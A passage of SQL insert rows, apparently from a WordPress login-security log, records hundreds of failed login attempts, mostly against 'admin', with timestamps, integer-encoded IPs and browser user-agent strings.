(101900, 1498190737.027699, 1, 'loginFailValidUsername', 'admin', 1, 1892514215, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101901, 1498190738.679271, 1, 'loginFailValidUsername', 'admin', 1, 1892514215, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101902, 1498191697.268322, 1, 'loginFailValidUsername', 'admin', 1, 1239185676, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101903, 1498192947.621656, 1, 'loginFailValidUsername', 'admin', 1, 2630103348, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101904, 1498194920.626033, 1, 'loginFailValidUsername', 'admin', 1, 1329838193, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101905, 1498194921.540531, 1, 'loginFailValidUsername', 'admin', 1, 1329838193, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101906, 1498195646.090655, 1, 'loginFailValidUsername', 'admin', 1, 1113016646, 'Mozilla/5.0 (en-us;)'),
(101907, 1498197360.517809, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1547655939, 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0'),
(101908, 1498197677.767886, 1, 'loginFailValidUsername', 'admin', 1, 3005362720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101909, 1498197679.089500, 1, 'loginFailValidUsername', 'admin', 1, 3005362720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101910, 1498197886.075140, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101911, 1498198773.179999, 1, 'loginFailValidUsername', 'admin', 1, 2631157514, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101912, 1498198775.026433, 1, 'loginFailValidUsername', 'admin', 1, 2631157514, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101913, 1498205298.066063, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101914, 1498205715.733355, 1, 'loginFailValidUsername', 'admin', 1, 3412439576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101915, 1498205717.103657, 1, 'loginFailValidUsername', 'admin', 1, 3412439576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101916, 1498210402.259077, 1, 'loginFailValidUsername', 'admin', 1, 1575310877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101917, 1498210403.309237, 1, 'loginFailValidUsername', 'admin', 1, 1575310877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101918, 1498213191.405930, 1, 'loginFailValidUsername', 'admin', 1, 1730847688, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101919, 1498213193.623996, 1, 'loginFailValidUsername', 'admin', 1, 1730847688, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101920, 1498213672.828207, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101921, 1498222061.485177, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101922, 1498222250.303941, 1, 'loginFailValidUsername', 'admin', 1, 3398297938, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101923, 1498222251.510265, 1, 'loginFailValidUsername', 'admin', 1, 3398297938, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101924, 1498222733.101308, 1, 'loginFailValidUsername', 'admin', 1, 3206702193, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101925, 1498222734.673055, 1, 'loginFailValidUsername', 'admin', 1, 3206702193, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101926, 1498223131.238489, 1, 'loginFailValidUsername', 'admin', 1, 2835215073, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101927, 1498223132.595282, 1, 'loginFailValidUsername', 'admin', 1, 2835215073, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101928, 1498223336.840130, 1, 'loginFailValidUsername', 'admin', 1, 1979308825, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101929, 1498223338.559803, 1, 'loginFailValidUsername', 'admin', 1, 1979308825, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101930, 1498225428.130278, 1, 'loginFailValidUsername', 'admin', 1, 1676138367, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101931, 1498226729.333425, 1, 'loginFailValidUsername', 'admin', 1, 3188957179, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101932, 1498226730.767737, 1, 'loginFailValidUsername', 'admin', 1, 3188957179, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101933, 1498227075.963981, 1, 'loginFailValidUsername', 'admin', 1, 762659066, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101934, 1498227077.506026, 1, 'loginFailValidUsername', 'admin', 1, 762659066, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101935, 1498228492.175255, 1, 'loginFailValidUsername', 'admin', 1, 2867854843, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101936, 1498229445.469734, 1, 'loginFailValidUsername', 'admin', 1, 1081592037, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101937, 1498229446.857670, 1, 'loginFailValidUsername', 'admin', 1, 1081592037, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101938, 1498229898.660835, 1, 'loginFailValidUsername', 'admin', 1, 453318637, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101939, 1498229900.006844, 1, 'loginFailValidUsername', 'admin', 1, 453318637, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101940, 1498231769.918963, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101941, 1498235390.860230, 1, 'loginFailValidUsername', 'admin', 1, 632957447, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101942, 1498236291.492660, 1, 'loginFailValidUsername', 'admin', 1, 1475976132, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101943, 1498236292.881814, 1, 'loginFailValidUsername', 'admin', 1, 1475976132, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101944, 1498239938.367523, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101945, 1498240401.053352, 1, 'loginFailValidUsername', 'admin', 1, 1743905101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101946, 1498240402.329313, 1, 'loginFailValidUsername', 'admin', 1, 1743905101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101947, 1498244034.622348, 1, 'loginFailValidUsername', 'admin', 1, 3126355895, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101948, 1498244035.970476, 1, 'loginFailValidUsername', 'admin', 1, 3126355895, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101949, 1498246226.524945, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101950, 1498246659.412626, 1, 'loginFailValidUsername', 'admin', 1, 3315471986, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101951, 1498246662.629997, 1, 'loginFailValidUsername', 'admin', 1, 3315471986, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101952, 1498248890.523333, 1, 'loginFailValidUsername', 'admin', 1, 3154283770, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101953, 1498248891.514830, 1, 'loginFailValidUsername', 'admin', 1, 3154283770, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101954, 1498249729.661127, 1, 'loginFailValidUsername', 'admin', 1, 2006579831, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101955, 1498249732.290907, 1, 'loginFailValidUsername', 'admin', 1, 2006579831, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101956, 1498251993.931695, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101957, 1498252026.754476, 1, 'loginFailValidUsername', 'admin', 1, 1545909030, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101958, 1498252027.750316, 1, 'loginFailValidUsername', 'admin', 1, 1545909030, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101959, 1498253019.943293, 1, 'loginFailInvalidUsername', 'center', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101960, 1498253021.745035, 1, 'loginFailValidUsername', 'julie', 2, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101961, 1498253023.588730, 1, 'loginFailValidUsername', 'pablo', 3, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101962, 1498253025.565317, 1, 'loginFailInvalidUsername', 'vous', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101963, 1498253027.415768, 1, 'loginFailInvalidUsername', 'training', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101964, 1498253029.211513, 1, 'loginFailInvalidUsername', 'notre', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101965, 1498253031.003331, 1, 'loginFailInvalidUsername', 'pour', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101966, 1498253032.781346, 1, 'loginFailInvalidUsername', 'cross', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101967, 1498253034.593616, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101968, 1498253036.594254, 1, 'loginFailInvalidUsername', 'venez', 0, 1137511638, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101969, 1498256590.335548, 1, 'loginFailValidUsername', 'admin', 1, 1309960562, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101970, 1498258050.314826, 1, 'loginFailValidUsername', 'admin', 1, 2410705134, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101971, 1498258051.740961, 1, 'loginFailValidUsername', 'admin', 1, 2410705134, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101972, 1498259040.350378, 1, 'loginFailValidUsername', 'admin', 1, 656526211, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101973, 1498259041.689369, 1, 'loginFailValidUsername', 'admin', 1, 656526211, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101974, 1498260017.314815, 1, 'loginFailValidUsername', 'admin', 1, 3574948740, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101975, 1498260435.554246, 1, 'loginFailValidUsername', 'admin', 1, 2534459701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101976, 1498261888.526005, 1, 'loginFailValidUsername', 'admin', 1, 3218485542, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101977, 1498262960.617269, 1, 'loginFailValidUsername', 'admin', 1, 1570286770, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101978, 1498262961.606907, 1, 'loginFailValidUsername', 'admin', 1, 1570286770, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101979, 1498263354.679316, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101980, 1498265826.571528, 1, 'loginFailValidUsername', 'admin', 1, 3134007565, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101981, 1498265828.095373, 1, 'loginFailValidUsername', 'admin', 1, 3134007565, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101982, 1498267323.851200, 1, 'loginFailValidUsername', 'admin', 1, 3138834971, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101983, 1498267325.283500, 1, 'loginFailValidUsername', 'admin', 1, 3138834971, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101984, 1498269593.522963, 1, 'loginFailValidUsername', 'admin', 1, 1328892392, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101985, 1498269594.492180, 1, 'loginFailValidUsername', 'admin', 1, 1328892392, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101986, 1498269689.387079, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101987, 1498269877.879214, 1, 'loginFailValidUsername', 'admin', 1, 3583327640, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101988, 1498269878.847806, 1, 'loginFailValidUsername', 'admin', 1, 3583327640, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101989, 1498270726.609512, 1, 'loginFailValidUsername', 'admin', 1, 3203903519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101990, 1498270729.212302, 1, 'loginFailValidUsername', 'admin', 1, 3203903519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101991, 1498275601.688631, 1, 'loginFailValidUsername', 'admin', 1, 1315794184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101992, 1498275602.785281, 1, 'loginFailValidUsername', 'admin', 1, 1315794184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101993, 1498276821.316889, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101994, 1498284464.695669, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101995, 1498290579.926541, 1, 'loginFailValidUsername', 'admin', 1, 1768440932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101996, 1498290581.064732, 1, 'loginFailValidUsername', 'admin', 1, 1768440932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101997, 1498291727.531268, 1, 'loginFailValidUsername', 'admin', 1, 2835408180, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101998, 1498291728.956868, 1, 'loginFailValidUsername', 'admin', 1, 2835408180, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101999, 1498291985.772565, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102000, 1498292338.752552, 1, 'loginFailValidUsername', 'admin', 1, 2026148082, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102001, 1498292460.308797, 1, 'loginFailValidUsername', 'admin', 1, 2249451200, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102002, 1498292820.606162, 1, 'loginFailValidUsername', 'admin', 1, 1494341211, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102003, 1498292821.595296, 1, 'loginFailValidUsername', 'admin', 1, 976839691, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102004, 1498294007.765872, 1, 'loginFailValidUsername', 'admin', 1, 84727772, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102005, 1498294008.805611, 1, 'loginFailValidUsername', 'admin', 1, 84727772, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102006, 1498296514.215747, 1, 'loginFailValidUsername', 'admin', 1, 1542064231, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102007, 1498296515.281067, 1, 'loginFailValidUsername', 'admin', 1, 1542064231, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102008, 1498297348.993453, 1, 'loginFailValidUsername', 'admin', 1, 831589706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102009, 1498297350.992011, 1, 'loginFailValidUsername', 'admin', 1, 831589706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102010, 1498300517.052942, 1, 'loginFailValidUsername', 'admin', 1, 1951055877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102011, 1498300518.491393, 1, 'loginFailValidUsername', 'admin', 1, 1951055877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102012, 1498302909.498105, 1, 'loginFailValidUsername', 'admin', 1, 1976433579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102013, 1498302911.073190, 1, 'loginFailValidUsername', 'admin', 1, 1976433579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102014, 1498304584.920755, 1, 'loginFailValidUsername', 'admin', 1, 3154283770, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102015, 1498308291.031138, 1, 'loginFailValidUsername', 'admin', 1, 1549150117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102016, 1498308425.158480, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102017, 1498311118.809920, 1, 'loginFailValidUsername', 'admin', 1, 2058455615, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102018, 1498311120.152572, 1, 'loginFailValidUsername', 'admin', 1, 2058455615, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102019, 1498311525.104666, 1, 'loginFailValidUsername', 'admin', 1, 3541712849, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102020, 1498311526.824196, 1, 'loginFailValidUsername', 'admin', 1, 3541712849, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102021, 1498312463.978098, 1, 'loginFailValidUsername', 'admin', 1, 1380923486, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102022, 1498312465.404055, 1, 'loginFailValidUsername', 'admin', 1, 1380923486, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102023, 1498312757.164248, 1, 'loginFailValidUsername', 'admin', 1, 834357323, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102024, 1498312759.163580, 1, 'loginFailValidUsername', 'admin', 1, 834357323, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102025, 1498316522.279867, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102026, 1498319743.320989, 1, 'loginFailValidUsername', 'admin', 1, 1379316302, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102027, 1498319744.575465, 1, 'loginFailValidUsername', 'admin', 1, 1379316302, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102028, 1498320147.809317, 1, 'loginFailValidUsername', 'admin', 1, 1295063143, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102029, 1498320148.941326, 1, 'loginFailValidUsername', 'admin', 1, 1295063143, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102030, 1498322693.758970, 1, 'loginFailValidUsername', 'admin', 1, 3017243680, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102031, 1498322695.141285, 1, 'loginFailValidUsername', 'admin', 1, 3017243680, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102032, 1498324353.487984, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102033, 1498330396.034184, 1, 'loginFailValidUsername', 'admin', 1, 3201326218, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102034, 1498330397.488116, 1, 'loginFailValidUsername', 'admin', 1, 3201326218, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102035, 1498331015.108793, 1, 'loginFailValidUsername', 'admin', 1, 1581122265, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102036, 1498331016.056877, 1, 'loginFailValidUsername', 'admin', 1, 1581122265, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102037, 1498331037.395720, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102038, 1498331326.874797, 1, 'loginFailValidUsername', 'admin', 1, 1840358767, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102039, 1498331328.005355, 1, 'loginFailValidUsername', 'admin', 1, 1840358767, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102040, 1498332051.223232, 1, 'loginFailValidUsername', 'admin', 1, 1314397598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102041, 1498332052.248106, 1, 'loginFailValidUsername', 'admin', 1, 1314397598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102042, 1498332828.709031, 1, 'loginFailValidUsername', 'admin', 1, 835613621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102043, 1498332829.915360, 1, 'loginFailValidUsername', 'admin', 1, 835613621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102044, 1498333075.844032, 1, 'loginFailValidUsername', 'admin', 1, 1417279797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102045, 1498333076.942887, 1, 'loginFailValidUsername', 'admin', 1, 1417279797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102046, 1498336764.927159, 1, 'loginFailValidUsername', 'admin', 1, 2537022330, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102047, 1498336966.597012, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102048, 1498339390.722811, 1, 'loginFailValidUsername', 'admin', 1, 3109639452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102049, 1498339393.285019, 1, 'loginFailValidUsername', 'admin', 1, 3109639452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
